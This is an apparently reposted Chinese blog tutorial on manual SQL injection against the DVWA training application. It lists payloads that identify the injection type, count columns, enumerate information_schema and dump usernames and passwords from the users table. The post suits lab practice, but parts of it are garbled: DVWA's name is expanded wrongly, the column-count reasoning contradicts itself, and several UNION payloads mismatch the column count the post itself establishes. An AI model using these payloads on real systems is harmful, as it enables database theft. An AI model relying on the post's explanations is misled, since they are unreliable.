博客
关于我
DVWA--SQL Injection(非盲注)--四个级别
阅读量:209 次
发布时间:2019-02-28

本文共 2372 字,大约阅读时间需要 7 分钟。

SQL 注入测试与渗透:DVWA 框架下的手动注入流程

SQL 注入是一种Web安全中的常见漏洞,攻击者通过向应用程序中输入恶意的SQL语句,破坏现有的查询逻辑,从而执行恶意操作。SQL注入漏洞能够导致数据库信息泄露、数据篡改甚至整个数据库的“脱库”,因此被广泛认为是Web安全中的高风险问题。

本文将基于DVWA( Dependency-Conflict Vulnerability Assessment )框架,逐步讲解手动SQL注入测试的过程,涵盖从低级别到高级别的测试方法,以及如何利用这些漏洞进行数据库渗透。


1. 判断注入类型:数字型 vs 字符型

在手动SQL注入中,首先需要判断注入类型,即注入是基于数字型还是字符型。以下是一些常见的测试方法:

  • 数字型注入

    • 输入 1,页面正常返回,表明注入点可能存在数字型漏洞。
    • 输入 1 and 1=2,页面异常或返回错误,说明可能存在数字型注入。
    • 输入 1' and '1'='1,页面异常或返回错误,说明字符型注入可能存在。
  • 字符型注入

    • 输入 1' and '1'='1,页面正常返回,表明注入点可能存在字符型漏洞。
    • 输入 1' and '1'='2,页面异常或返回错误,说明字符型注入可能存在。

通过以上测试,可以初步判断注入类型,并为后续操作做好准备。


2. 猜解字段数量

接下来需要确定SQL查询语句中所涉及的字段数量。可以通过以下方法进行测试:

  • 使用 ORDER BY

    • 输入 1 order by 1,页面正常返回,说明至少有一个字段。
    • 输入 1 order by 2,页面正常返回,说明至少有两个字段。
    • 输入 1 order by 3,页面异常返回,说明字段数量小于3。
  • 使用 UNION SELECT

    • 输入 1 union select 1,页面异常返回,说明至少有两个字段。
    • 输入 1 union select 1,2,页面正常返回,说明至少有两个字段。
    • 输入 1 union select 1,2,3,页面异常返回,说明字段数量小于3。

通过以上方法,可以准确判断出SQL查询语句中涉及的字段数量,为后续注入操作提供依据。


3. 确定可注入字段位置

接下来需要确定哪些字段位置可以进行注入利用。可以通过以下方法实现:

  • 使用 UNION SELECT
    • 输入 1' and 1=2 union select 1,2,页面正常返回,说明两个字段位置都可以注入利用。
    • 输入 1' and 1=2 union select 1,3,页面异常返回,说明第三个字段位置不可注入。

通过观察返回的数据,可以判断哪些字段位置可以利用注入点,进而制定后续操作策略。


4. 查询当前使用的数据库

在SQL注入过程中,通常需要获取当前使用的数据库信息。可以通过以下方法实现:

  • 使用 UNION SELECT database()

    • 输入 1' and 1=2 union select database(),页面正常返回,显示当前数据库名称(如 dvwa)。
  • 查询所有数据库

    • 输入 1' and 1=2 union select table_schema from information_schema.tables,页面正常返回,列出所有数据库名称。

通过以上方法,可以获取当前使用的数据库信息,为后续操作提供重要数据支持。


5. 查询数据库中的表

在掌握数据库名称后,需要查询数据库中的所有表信息。可以通过以下方法实现:

  • 获取当前数据库中的表

    • 输入 1' and 1=2 union select table_name from information_schema.tables where table_schema=database(),页面正常返回,列出当前数据库中的所有表名称。
  • 获取所有数据库中的表

    • 输入 1' and 1=2 union select table_name from information_schema.tables,页面正常返回,列出所有数据库中的表名称。

通过以上方法,可以获取目标数据库中的表信息,为后续操作提供数据支持。


6. 查询表中的字段

在掌握表名称后,需要查询表中的字段信息。可以通过以下方法实现:

  • 获取当前表中的字段
    • 输入 1' and 1=2 union select column_name from information_schema.columns where table_name='users',页面正常返回,列出指定表中的字段名称。

通过以上方法,可以获取表中的字段信息,为后续注入操作提供重要数据支持。


7. 查询字段的具体值

在掌握字段名称后,需要查询字段的具体值。可以通过以下方法实现:

  • 获取用户信息

    • 输入 1' and 1=2 union select user_id, first_name, last_name from users,页面正常返回,列出用户信息。
  • 获取密码信息

    • 输入 1' and 1=2 union select user_id, password from users,页面正常返回,列出用户账号和密码。

通过以上方法,可以获取字段的具体值,完成数据库渗透。


8. 总结与建议

通过以上步骤,可以逐步完成SQL注入测试的整个流程。需要注意以下几点:

  • 测试环境的准备:确保测试环境的安全性,避免对生产环境造成影响。
  • 工具的选择:手动注入工具的选择可以根据具体需求进行调整,如使用 sqlmap 等自动化工具。
  • 防护措施:了解并遵守Web应用的安全最佳实践,减少SQL注入漏洞的发生概率。
  • 通过以上方法,可以在DVWA框架中安全地进行SQL注入测试,并掌握数据库渗透的关键技术。

    转载地址:http://shqi.baihongyu.com/

    你可能感兴趣的文章
    NIO Selector实现原理
    查看>>
    nio 中channel和buffer的基本使用
    查看>>
    NIO基于UDP协议的网络编程
    查看>>
    NISP一级,NISP二级报考说明,零基础入门到精通,收藏这篇就够了
    查看>>
    Nitrux 3.8 发布!性能全面提升,带来非凡体验
    查看>>
    NI笔试——大数加法
    查看>>
    NLog 自定义字段 写入 oracle
    查看>>
    NLP 基于kashgari和BERT实现中文命名实体识别(NER)
    查看>>
    NLP 项目:维基百科文章爬虫和分类【01】 - 语料库阅读器
    查看>>
    NLP_什么是统计语言模型_条件概率的链式法则_n元统计语言模型_马尔科夫链_数据稀疏(出现了词库中没有的词)_统计语言模型的平滑策略---人工智能工作笔记0035
    查看>>
    NLP学习笔记:使用 Python 进行NLTK
    查看>>
    NLP问答系统:使用 Deepset SQUAD 和 SQuAD v2 度量评估
    查看>>
    NLP:使用 SciKit Learn 的文本矢量化方法
    查看>>
    Nmap扫描教程之Nmap基础知识
    查看>>
    Nmap端口扫描工具Windows安装和命令大全(非常详细)零基础入门到精通,收藏这篇就够了
    查看>>
    NMAP网络扫描工具的安装与使用
    查看>>
    NMF(非负矩阵分解)
    查看>>
    NN&DL4.1 Deep L-layer neural network简介
    查看>>
    NN&DL4.3 Getting your matrix dimensions right
    查看>>
    NN&DL4.8 What does this have to do with the brain?
    查看>>